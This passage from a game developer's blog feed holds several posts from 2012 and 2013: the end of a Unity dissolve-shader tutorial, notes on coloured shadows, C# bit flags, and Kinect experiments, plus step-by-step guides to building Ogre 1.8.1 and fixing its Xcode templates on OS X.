<span class="kt">int</span> <span class="n">isClear</span> <span class="o">=</span> <span class="kt">int</span><span class="p">(</span><span class="n">dissolve</span><span class="p">.</span><span class="n">r</span> <span class="o">-</span> <span class="p">(</span><span class="n">_DissolveVal</span> <span class="o">+</span> <span class="n">_LineWidth</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.99</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">isAtLeastLine</span> <span class="o">=</span> <span class="kt">int</span><span class="p">(</span><span class="n">dissolve</span><span class="p">.</span><span class="n">r</span> <span class="o">-</span> <span class="p">(</span><span class="n">_DissolveVal</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.99</span><span class="p">);</span>
<span class="n">half4</span> <span class="n">altCol</span> <span class="o">=</span> <span class="n">lerp</span><span class="p">(</span><span class="n">_LineColor</span><span class="p">,</span> <span class="n">clear</span><span class="p">,</span> <span class="n">isClear</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">lerp</span><span class="p">(</span><span class="n">o</span><span class="p">.</span><span class="n">Albedo</span><span class="p">,</span> <span class="n">altCol</span><span class="p">,</span> <span class="n">isAtLeastLine</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">Alpha</span> <span class="o">=</span> <span class="n">lerp</span><span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">0.0</span><span class="p">,</span> <span class="n">isClear</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>It takes 3 lines to make the shader transparent. The Tags.. line tells Unity to render objects using this shader when it renders transparent geometry and the Blend line defines how our transparency behaves. The one above tells our shader to use alpha blending (as opposed to being additive, or multiplicative transparency). Finally the o.Alpha… line defines the transparency of the fragment being shaded.</p>
<p>Put all together, you have the Dissolve Diffuse shader from my Dissolve Shader pack! Hopefully this tutorial was helpful. Shoot any feedback you have to me <a href="http://twitter.com/khalladay">on Twitter</a>. Happy shading!</p>
Multi Coloured Shadows In Unity2013-08-13T00:00:00+00:00http://kylehalladay.com/blog/2013/08/13/Coloured-Shadows<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plansto update it. Beware!
</div>
<p><br /></p>
<p><strong>UPDATE: I’ve posted a tutorial on how to get coloured shadows working in your project. Check it out <a href="http://kylehalladay.com/all/blog/2014/05/16/Coloured-Shadows-In-Unity.html">here</a></strong></p>
<p>Lately, in my (precious little) free time, I’ve been working on a custom shadow receiver system which will give me greater control over the appearance of soft shadows in Unity. On the surface, it sounds like a fun project. It gets slightly more insane when you take into account that i had never so much as written my own shadow map system before starting this. Crawling is boring, I tend to jump (metaphorical) cliffs and hope that I figure out flying, running, landing, and crawling by the time I hit ground.</p>
<p>At first, I thought I’d actually start from the ground up and simply disable the Unity shadows altogether and substitute my own depth maps. It works pretty well for one light, but I’ve run into issues trying to pass multiple shadow maps to multiple passes in Unity. I’m not yet sure whether thats a limitation on my own knowledge, or just something that Unity doesn’t let you do. Once I hit that wall though, it occurred to me that it might just be easier to tap into the shadow maps already being generated. It would certainly save a lot of extra scripts, and would benefit from all the work that’s already gone into Unity.</p>
<div align="center">
<img src="/images/post_images/2013-08-13/shadowmap.png" /><br />
<font size="2">
(Manually making shadow maps, the depth map from the light is displayed in the corner)
</font>
</div>
<p><br /></p>
<p>And so, I (once again) entered the wonderful world of undocumented Unity functionality. This time, I ended up delving through the CGInclude files that come with the built in shaders. The result of this was an interesting set of variables defined in the UnityShaderVariables.cginc and AutoLight.cginc files, namely: unity_World2Shadow[4], _ShadowMapTexture, _LightShadowData and the macro UNITY_SAMPLE_SHADOW_PROJ.</p>
<p>Most of the above is self explanatory, but the macro was something I hadn’t thought about. A lot of functionality is wrapped in macros in the built in shaders, which handle the difference between DirectX and GLSL shading.</p>
<p>Once I knew what the internal variables were called, it was pretty easy to get rudimentary hard shadows up and running using the built in shadow map…. for one light. I’m still working on getting multiple lights working at once, but, in the interest of enjoying small victories, I figured I’d do something a bit fun with the new shadows I had made. Since I now have complete control over the shader producing the shadows, why not change their colour. Therefore, may I present, the most fabulous looking hard shadows ever produced in Unity…probably!</p>
<div align="center">
<img src="/images/post_images/2013-08-13/multi-shadows.png" /><br />
<font size="2">
(The purple's darkness gets set by the depth value for that fragment)
</font>
</div>
<p><br /></p>
<p>A lot of work goes into making games look realistic, but I think that there’s a lot to be said for making games look uniquely different from norm. Purple shadows are how I’m doing that today :D</p>
<p>As always, send me a message <a href="http://twitter.com/khalladay">on Twitter</a> if you want to chat (especially about games or graphics).</p>
Bit Flags are Pretty Cool2013-04-21T00:00:00+00:00http://kylehalladay.com/blog/2013/04/21/Bit-Flags-Are-Pretty-Cool<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans on updating it. Beware!
</div>
<p><br /></p>
<p>I’ve been working on prototype for (possibly) my next personal project, and one of the things I’ve needed to do a number of times is store a lot of boolean attributes on different objects. This led to some really terrible looking scripts with a whole host of boolean flags at the top of them, and I decided I needed to find a better way of handling things.
<br />
<br />
I’ve had some fun before with packing a whole bunch of booleans into byte-sized structs using the bit field operator in C++, but I’ve never seen anything like that done in C#, and if I can help it, I try to avoid dealing directly with memory addresses in Unity scripts. Luckily, bit flags seem to do the exact same job (possibly better). To show you what I mean, let me link an example:
<br />
<br /></p>
<script src="https://gist.github.com/khalladay/5432282.js" class="gist"> </script>
<p><br />
So here’s whats going on: rather than specifying a int or float value for the members of the enum, you can assign each of them a hex number. Provided each of these hex numbers match up to the values represented by each bit in a byte (powers of 2), you can use all of the regular bitwise operations with these new enum values.</p>
<script src="https://gist.github.com/khalladay/a5ecf560b97f746829b1.js" class="gist"> </script>
<p>Provided the player can only have 1 of each item, you could do an entire inventory this way (not that I think that would be the greatest idea). Nevertheless, it’s certainly handy for fast prototyping, and I’m sure that less contrived examples will find their way into production code at some point.</p>
Fun With The Kinect2013-03-11T00:00:00+00:00http://kylehalladay.com/blog/2013/03/11/Fun-with-the-kinect<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br /></p>
<p>I’ve been playing around with the Kinect this month (I love that thing). I’ve used it in the past with some gesture control and image processing at work, but I hadn’t really considered it as an option for gamedev, mostly because I don’t have an xbox sdk. I’ve been trying to think of cool ways to use it though, lest it become the coolest dust collector I have in my apartment, and I think I’m on to something this month</p>
<p>As you’ve probably gathered from my other work, I suck at visual art, and it’s probably my least favourite thing to work on when making a game, so any time I can find a cool way to simplify that process I jump on it (why do you think I got into augmented reality?). This month I’ve been experimenting with capturing the output from a kinect and using that in place of 3D models. It may not be useful for all situations, but the results are pretty cool, don’t you think?</p>
<p><img src="/images/post_images/fun-with-the-kinect/kinectbody.png" alt="Alt Text" /></p>
Unbreaking the Xcode templates in Xcode 4.52012-12-02T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2012/12/02/Taming-The-Ogre-Part2<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2012!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br /></p>
<p>The Xcode templates that come with Ogre 1.81 are rather frustrating to get working, especially if you don’t know what the cryptic error messages that it spits out at you mean. So I’m here today to walk you step by step through getting a basic Ogre project up and running.</p>
<p>All of this is taken from my experiences trying to get Ogre to work on my machine. Given that the templates bundled with Ogre were written by people much more knowledgeable than me, it wouldn’t surprise me if some of these issues aren’t universal problems. Hopefully my experiences are helpful, even if you only hit one of the numerous issues I described here.</p>
<p>###What you will need:###</p>
<ul>
<li>A built version of Ogre 1.81 (see my previous post for how to build this)</li>
<li>The Ogre Xcode templates installed (found in Ogre’s SDK/OSX folder)</li>
</ul>
<p>Note: This tutorial was written based on my experience working with Xcode 4.5, and OS X Lion. YMMV if you’re following along with a different configuration.</p>
<p>###Starting the Project###</p>
<p>Let’s start at ground zero. Open Xcode and do the following:</p>
<p>Start a new project, and select the “Mac OS X Application” template in the Ogre category.
After naming your project, fill in the path to your Ogre SDK with the appropriate value.
Welcome to linker hell.</p>
<p>For some reason, xcode has the annoying tendency to omit the leading / in the include paths in the OGRE template (regardless of whether you remembered to include on in the path to your SDK). So the first thing that has to be done to make this project build-able is to navigate to your build settings, and modify all the file paths located in the Framework Search Paths, Header Search Paths, and Library Search paths so that they begin with a /</p>
<p>Next, move to the “Build Phases” tab and expand the “Link Binary With Libraries” section. You should see Ogre.framework, OpenGL.framework, and QuartzCode.framework appearing in red. I think this is a problem with the template itself, but in any case, it’s easily fixed. For the second two, simply hit the + button and find them in the list of Apple frameworks, andthen delete the red list entries.</p>
<p>Ogre.framework can be found in the lib/debug folder in your build directory, so add that to your project as well.</p>
<p>Now hit build. If everything is identical to my set up, you should get a build error saying that OgreCamera.h can’t be found. Theres a good reason for this: the include paths are missing a few directories. Rather than describe how to fix this, I’ve attached a screenshot of what my include paths end up looking like when I’m through fixing them. “1.81″ is the folder which stores my built Ogre3D library, and “ogre_src_v1-8-1″ is the root folder of the ogre sdk.</p>
<p><img src="/images/post_images/taming-the-ogre2/include_paths.png" alt="Include Paths" /></p>
<p>This may not be the most optimal way to set up your include paths (I’m really, really hoping it isn’t, it’s pretty messy), but I’ve ran into strange issues marking things recursive, and so far, this set up has worked for me. Let me know if there’s a better way of doing things in the comments, and I’ll update this tutorial.</p>
<p>Next move to the Library Search paths, and ensure that both paths are pointing to the correct location of the files they need. One should be pointing to the location of your ogre lib, and the other to the lib folder of your dependencies. If you hit build and see an error like this:</p>
<p><img src="/images/post_images/taming-the-ogre2/lOIS_error.png" alt="Error Message" /></p>
<p>it means that this step has not been done correctly.</p>
<p>###Restrict your architectures!###</p>
<p>Next ensure that your project is set to build only for the 64 bit architecture. As I mentioned in the last post, currently my set up is only configured to build for 64 bit machines, because I was running into a boat load of configuration errors trying to build for i386 as well. Since I’m nowhere near releasing something with OGRE just yet, I’ve decided to put off figuring out i386 config issues until I absolutely have to.</p>
<p>###Catching a wild Ditto!###</p>
<p>If you hit build now, you should end up with 1 error, the cryptically named “shell script invocation error,” which looks something like this:</p>
<p><img src="/images/post_images/taming-the-ogre2/ditto_error.png" alt="Ditto Error" /></p>
<p>It’s a shame that this isn’t more descriptive, because it took me a long time to understand exactly what was going on, but fixing it is dead simple once you know what the error means.</p>
<p>Ogre’s build process involves copying files from your Media paths to the content folder of the built application. This is done at the end of your build process by a shell script, and the script used to copy these files is called ditto. All this error is saying, is that a path supplied to the ditto command is wrong.</p>
<p>To fix this, go back to your project settings, and get to your “Build Phases” tab. Expand the “Run Script” item (should be at the bottom of your build phases list”), and you should immediately see the ditto commands.</p>
<p>The offender is the last line,</p>
<p>ditto $PROJECT_DIR/$PROJECT_NAME/*.cfg “$BUILT_PRODUCTS_DIR/Tutorial.app/Contents/Resources/”</p>
<p>(Note: Tutorial.app will be replaced by whatever you called the project on your machine)</p>
<p>There’s a problem with the location of quotation marks here, which is causing the source path to be misinterpreted. Simply move the punctuation around to solve:</p>
<p>ditto “$PROJECT_DIR/$PROJECT_NAME/”*.cfg “$BUILT_PRODUCTS_DIR/OgreTest2.app/Contents/Resources/”</p>
<p>Hit build now, you should (finally) have a successful compile.</p>
<p>###Not there yet.###</p>
<p>Unfortunately, we’re not done. Because now we get to sort through runtime errors. In your output, or your Ogre log file, you should see a message along the lines of</p>
<p>OGRE EXCEPTION(7:InternalErrorException): Could not load dynamic library ./RenderSystem_GL.</p>
<p>This is because we haven’t configured OGRE to know where our Plugins are yet. The quickest way to fix this is to open up the file plugins.cfg, and replace</p>
<p>PluginFolder=./</p>
<p>with</p>
<p>PluginFolder= (path to build/lib/release)</p>
<p>Now, hit build/run one more time, and you should be greeted with this screen:</p>
<p><img src="/images/post_images/taming-the-ogre2/config_screen.png" alt="Config Screen" /></p>
<p>Hit ok again to finally view the sum of all of our hard work:</p>
<p><img src="/images/post_images/taming-the-ogre2/ogrehead.png" alt="Config Screen" /></p>
<p>Finally, it’s all working! If you run into any problems not addressed here, grab me on twitter and we can work through it. I’d love to dig into this build process more through troubleshooting problems I haven’t hit yet. Additionally, if anyone has a better way of getting all of this done / setting up an Ogre project in Xcode, I’d love to hear about it, because I’m really hoping theres a less messy way of getting it all set up / configuring it for 1386. Regardless, thanks for reading!</p>
Building Ogre 1.81 on Lion2012-11-19T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2012/11/19/Taming-The-Ogre-Part1<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2012!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br />
I’ve recently decided that I need to go open source for my hobby projects, namely because I’ve reached a point where Unity Free is becoming too restrictive for my tastes, yet I’m still too poor to buy Unity Pro (one day I’ll make a game that pays for more than a night at a bar, but that day hasn’t happened yet).</p>
<p>After spending a long week trying to make JMonkey suit my needs (namely: an asset pipeline that doesn’t make me want to shoot myself), I abandoned it and meekly returned to the engine of my third year at Humber: Ogre3D. I had only worked with the precompiled windows binaries until now, but how hard could building it from source (because if I’m going open source, I may as well embrace the whole deal) on my mac be?</p>
<p>Three days of pulling my hair out later, I finally have not only Ogre 1.81 built on my mac, but I also have the Xcode 4 template project compiling, and because theres absolutely no reason that ANYONE should have to spend three days trying to weed through outdated tutorials, I’m posting the whole process here in exhaustive detail, with the hopes that it helps at least one other poor soul trying to do this.</p>
<p>This post will ONLY cover building the engine itself. The next article will cover how to get the Xcode 4 templates to work (they’re broken in some weird spots in Xcode 4.5).</p>
<p>###Ingredients###</p>
<ul>
<li>OGRE 1.8.1 Source for Linux/OSX</li>
<li>Mac OS X Ogre Dependencies – (this tutorial assumes you’re grabbing the precompiled ones, just to limit the number of things that can go wrong)</li>
<li>CG Framework</li>
<li>CMake 2.8.10.1</li>
<li>This tutorial assumes you’re using Xcode 4.5, although I don’t know if that makes a difference for what we’re doing.</li>
</ul>
<p>###Setting up the source directory###</p>
<ul>
<li>Extract the Ogre src zip file into wherever you want your Ogre SDK to be installed to. I just put it in my Macintosh HD directory so that it was easy to find, but I think the more correct place to put it is in ~/Library/Developer/SDKs</li>
<li>Extract the precompiled dependencies into the top level folder in the ogre sdk directoy (in my case /ogre_src_v1-8-1/)</li>
<li>Create a directory in your root folder called “boost”</li>
<li>Drag the folder called boost out of Dependencies/include into the boost folder you just made</li>
<li>Create a folder called lib in the boost folder (ie/ /ogre_src_v1-8-1/boost/lib)</li>
<li>drag the boost libraries at Dependencies/lib into this folder.</li>
</ul>
<p>###Cooking With CMake###</p>
<ul>
<li>Start CMake’s GUI tool</li>
<li>Hit the Browse Source button on the top right, and select the ogre sdk folder that you’ve been working with<</li>
<li>Copy and paste this directory into the “Where to build the binaries” field as well. Add the name of your build folder to the end of this path. For me, this was /ogre_src_v1-8-1/1.81, but the name of folder isn’t important, it’s just important that this build folder IS NOT your root sdk folder. That way, if something goes wrong, you can start the build process over again without having to do all the previous steps.</li>
<li>Hit “Configure” and make sure that “Xcode” and “Use default native compilers” is selected. Then click done</li>
<li>You should see a bunch of options highlighted in red. That’s fine. Ensure that OGRE_BUILD_CG is selected, and then press configure again. NOTE: the Cmake console will show a number of warnings in red. IGNORE THESE.</li>
<li>Once that’s done, click “Generate” and exit CMake</li>
</ul>
<p>###Building Ogre###</p>
<ul>
<li>Navigate to your build directory now, and open the Xcode project you just generated.</li>
<li>Delete i386 from your project’s valid architectures (otherwise boost complains. Long term, I think only building for 64 bit is going to cause some problems, but in the interest of getting things running quickly, I ignored these worries for now)</li>
<li>Set your project to build for “My Mac 64-bit,” and your Architectures to “64-bit-intel”</li>
<li>Hit build, watch the magic happen.</li>
<li>If you want to, once the build is complete, change your build to release mode and build again to get Ogre built in release.</li>
</ul>
<p>###Verifying the Build###</p>
<ul>
<li>You should now have 2 folders in your build directories bin folder. (Release and Debug), inside each folder should be a copy of SampleBrowser.app. To ensure everything is working, run one of these programs and go through each sample.</li>
<li>Hopefully all the samples should be in working order. Congratulations, you now have a built copy of Ogre sitting on your computer!</li>
</ul>
<p>If you run into any problems, message me on twitter and I’ll do my best to figure out what’s going on with your build. I’m definitely not an expert, or even demonstrably good at using Ogre, but I’d like to think that all the troubleshooting I’ve done this week makes me a decent resource when it comes to just building the engine on mac. Good luck!</p>